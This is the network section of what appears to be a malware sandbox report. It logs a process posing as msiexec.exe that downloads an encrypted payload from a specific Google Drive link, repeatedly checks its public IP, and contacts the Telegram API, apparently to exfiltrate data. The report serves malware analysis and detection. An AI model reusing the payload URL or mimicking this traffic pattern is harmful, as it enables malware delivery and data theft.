                                                                                                                                          Jan 8, 2025 16:21:36.803332090 CET44349728149.154.167.220192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:36.997536898 CET44349728149.154.167.220192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:36.997603893 CET44349728149.154.167.220192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:36.997673988 CET49728443192.168.2.8149.154.167.220
                                                                                                                                          Jan 8, 2025 16:21:37.008418083 CET49728443192.168.2.8149.154.167.220
                                                                                                                                          Jan 8, 2025 16:21:42.815015078 CET4971680192.168.2.8132.226.8.169

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 8, 2025 16:21:17.608392954 CET5350353192.168.2.81.1.1.1
                                                                                                                                          Jan 8, 2025 16:21:17.615252018 CET53535031.1.1.1192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:18.674489975 CET6453053192.168.2.81.1.1.1
                                                                                                                                          Jan 8, 2025 16:21:18.683943033 CET53645301.1.1.1192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.257673979 CET5877053192.168.2.81.1.1.1
                                                                                                                                          Jan 8, 2025 16:21:22.264601946 CET53587701.1.1.1192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:23.828490019 CET6157053192.168.2.81.1.1.1
                                                                                                                                          Jan 8, 2025 16:21:23.836251974 CET53615701.1.1.1192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:36.129767895 CET4920553192.168.2.81.1.1.1
                                                                                                                                          Jan 8, 2025 16:21:36.138704062 CET53492051.1.1.1192.168.2.8

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Jan 8, 2025 16:21:17.608392954 CET192.168.2.81.1.1.10xe50dStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:18.674489975 CET192.168.2.81.1.1.10x5b55Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:22.257673979 CET192.168.2.81.1.1.10x3da0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:23.828490019 CET192.168.2.81.1.1.10x86e6Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:36.129767895 CET192.168.2.81.1.1.10xfd13Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Jan 8, 2025 16:21:17.615252018 CET1.1.1.1192.168.2.80xe50dNo error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:18.683943033 CET1.1.1.1192.168.2.80x5b55No error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:22.264601946 CET1.1.1.1192.168.2.80x3da0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:22.264601946 CET1.1.1.1192.168.2.80x3da0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:22.264601946 CET1.1.1.1192.168.2.80x3da0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:22.264601946 CET1.1.1.1192.168.2.80x3da0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:22.264601946 CET1.1.1.1192.168.2.80x3da0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:22.264601946 CET1.1.1.1192.168.2.80x3da0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:23.836251974 CET1.1.1.1192.168.2.80x86e6No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:23.836251974 CET1.1.1.1192.168.2.80x86e6No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                          Jan 8, 2025 16:21:36.138704062 CET1.1.1.1192.168.2.80xfd13No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • drive.google.com
                                                                                                                                          • drive.usercontent.google.com
                                                                                                                                          • reallyfreegeoip.org
                                                                                                                                          • api.telegram.org
                                                                                                                                          • checkip.dyndns.org

                                                                                                                                          HTTP Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.849711132.226.8.169803504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 8, 2025 16:21:22.273201942 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 8, 2025 16:21:23.304405928 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:23 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 8, 2025 16:21:23.307410955 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 8, 2025 16:21:23.580158949 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:23 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                          Jan 8, 2025 16:21:24.486007929 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 8, 2025 16:21:24.754890919 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:24 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.849714132.226.8.169803504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 8, 2025 16:21:25.409346104 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 8, 2025 16:21:26.241235018 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:26 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.849716132.226.8.169803504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 8, 2025 16:21:26.863919020 CET127OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Jan 8, 2025 16:21:27.971503973 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:27 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.849718132.226.8.169803504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 8, 2025 16:21:28.622235060 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 8, 2025 16:21:29.550122976 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:29 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.849720132.226.8.169803504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 8, 2025 16:21:30.199228048 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 8, 2025 16:21:31.035387039 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:30 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.849722132.226.8.169803504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 8, 2025 16:21:31.648511887 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 8, 2025 16:21:32.461195946 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:32 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.849724132.226.8.169803504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 8, 2025 16:21:33.084923983 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 8, 2025 16:21:33.870878935 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:33 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.849726132.226.8.169803504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 8, 2025 16:21:34.497817039 CET151OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Jan 8, 2025 16:21:35.484287024 CET273INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:35 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 104
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.849709142.250.184.2384433504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 15:21:18 UTC216OUTGET /uc?export=download&id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                          Host: drive.google.com
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2025-01-08 15:21:18 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                          Content-Type: application/binary
                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:18 GMT
                                                                                                                                          Location: https://drive.usercontent.google.com/download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=download
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          Content-Security-Policy: script-src 'nonce-YLoAxjVwgMvY-XApkVQdAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                          Server: ESF
                                                                                                                                          Content-Length: 0
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.849710142.250.181.2254433504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 15:21:19 UTC258OUTGET /download?id=1wmwZCb5HsLP8Yqdvke2hD-vN5VaKU3NI&export=download HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Host: drive.usercontent.google.com
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-08 15:21:21 UTC4936INHTTP/1.1 200 OK
                                                                                                                                          X-GUploader-UploadID: AFiumC4hXhCUoP6tYuSbu0iENby_WYaYMfQ4jZNv6eZKi50ZUoGtwXKpSCq_6LtboGK6KY2b
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Content-Security-Policy: sandbox
                                                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Content-Disposition: attachment; filename="ESTtssjiXSfwu98.bin"
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 273984
                                                                                                                                          Last-Modified: Tue, 10 Dec 2024 20:01:44 GMT
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:21 GMT
                                                                                                                                          Expires: Wed, 08 Jan 2025 15:21:21 GMT
                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                          X-Goog-Hash: crc32c=Loainw==
                                                                                                                                          Server: UploadServer
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Connection: close
                                                                                                                                          2025-01-08 15:21:21 UTC4936INData Raw: cc e0 ff 98 f5 20 ad bd 4f 38 60 66 c9 db ed c7 c1 d9 0f 6c 00 a7 57 df b4 42 ab 46 c8 2e eb 38 22 21 12 6d 06 8a 1c 7f 14 25 67 a0 46 24 fb 66 59 80 80 51 c7 9a f8 4d 45 bb 5c 14 90 f2 21 8e 86 97 6f 47 90 5b cf 61 dc f5 59 30 17 58 4a 68 2e 6a bd b2 d4 4b 38 1d 3b 72 c0 d4 d5 ea e6 af f4 76 1a 08 06 95 f3 1b 62 3b df e1 54 52 5f 0a ed 25 3b e1 05 ef ee c3 67 1a 51 99 ec 57 f9 91 3a 9e 8b 20 d6 77 d3 58 be b1 94 fb 5d b5 5f 37 62 43 72 ab 89 61 16 be 7d 87 ee 96 ad bb cb 54 c8 00 2c 59 20 1e 44 87 87 dc f3 64 b8 15 b2 e9 3c 88 00 db 2a 82 0e cc 47 d1 a2 59 17 85 d5 1c d8 d0 57 86 dc 02 03 6f 5a 12 49 a0 60 b2 76 83 18 3d 43 79 e4 dd 8d a4 e7 ef 74 a3 e7 aa ea 5a 03 75 36 75 69 37 fb ec 65 97 74 c4 9d 51 e5 d6 14 46 be 58 42 f3 c6 eb c6 f8 fa 2c 76 a0 08
                                                                                                                                          Data Ascii: O8`flWBF.8"!m%gF$fYQME\!oG[aY0XJh.jK8;rvb;TR_%;gQW: wX]_7bCra}T,Y Dd<*GYWoZI`v=CytZu6ui7etQFXB,v
                                                                                                                                          2025-01-08 15:21:21 UTC4827INData Raw: 85 94 57 c7 b2 ab 52 85 57 4d 29 71 15 52 81 62 50 d6 24 d1 cc 88 23 ee b8 84 e6 06 40 37 db a8 88 40 19 7b 05 dd b1 ee cd ef 19 2f 90 a0 a8 6b df ed 04 25 1f 42 a0 01 f9 b3 f3 2e 9c e0 17 cb 50 ec 28 05 22 b6 02 2c 86 f2 fb 01 9b d9 eb 74 18 1d 6a eb ca 44 95 cb b5 ff 47 93 48 cf 61 c9 f5 59 42 4a ae 4a 18 9c 6c d2 d1 d4 4b 32 02 5b 8c c4 c7 d0 fb e3 83 f9 70 05 28 10 fa 97 1b 62 31 d5 e1 7f 49 59 65 8e 25 3b eb 1a cf 10 c1 74 1c 40 9f 40 5c ff 87 2b a1 5e 4b d6 c3 d0 9f 9f 0a 9e b0 96 bc 4b 5f 0b 36 5e a8 9d 0e 71 c6 11 e3 cc fd bf b2 a5 3b b6 4f 26 3c 00 66 5e 80 a7 b5 97 57 f8 84 f1 ec 79 d3 64 be 0e 9c 04 c6 4b b3 a2 59 1d 5b d5 1c a2 94 47 86 90 03 00 6e d2 f1 bf c6 70 f7 76 83 19 26 73 7a 04 6c 8f a5 ec fa 24 a3 f6 b2 ee 72 69 61 36 7f 62 30 d3 b6
                                                                                                                                          Data Ascii: WRWM)qRbP$#@7@{/k%B.P(",tjDGHaYBJJlK2[p(b1IYe%;t@@\+^KK_6^q;O&<f^WydKY[Gnpv&szl$ria6b0
